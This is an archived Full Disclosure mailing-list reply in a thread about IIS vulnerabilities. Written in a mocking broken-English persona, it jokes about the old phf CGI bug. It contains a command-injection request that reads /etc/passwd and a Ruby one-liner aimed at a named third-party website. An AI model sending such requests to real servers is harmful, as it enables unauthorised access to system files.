Full Disclosure mailing list archives

Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

From: Григорий Братислава <musntlive () gmail com>
Date: Tue, 17 Jul 2012 11:23:36 -0400

On Tue, Jul 17, 2012 at 10:11 AM, king cope
<isowarez.isowarez.isowarez () googlemail com> wrote:

Hello Jan,
I did some additional tests for the IIS bugs.

* IIS 6.0 PHP authentication bypass is only possible on Windows Server
2003 SP1. SP2 seems unaffected
  So take that bug as resolved, my mistake as I didn't have a fully
patched system online when testing.


kingcope are we is release advisories to patched software? Is so, then
I introduce exploit along with you.

Hello full disclosure!! !! !!

Is like to warn you about phf vulnerability. Is hackers can get your
password list in is unpatched server.

PoC on is my system:

213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -

In Ruby (here we is own rsnake):

require 'open-uri'
open('http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
HTTP/1.0'){ |f| print f.read }

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin, (continued)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
  - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Thor (Hammer of God) (Jul 16)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
  - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 16)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
    - Message not available
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
    - Message not available
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Jan Reilink (Jul 17)
  - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
  - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 17)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Gage Bystrom (Jul 17)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Gage Bystrom (Jul 17)
    - Message not available
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
    - Message not available
    - Message not available
    - Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin sumit kumar soni (Jul 19)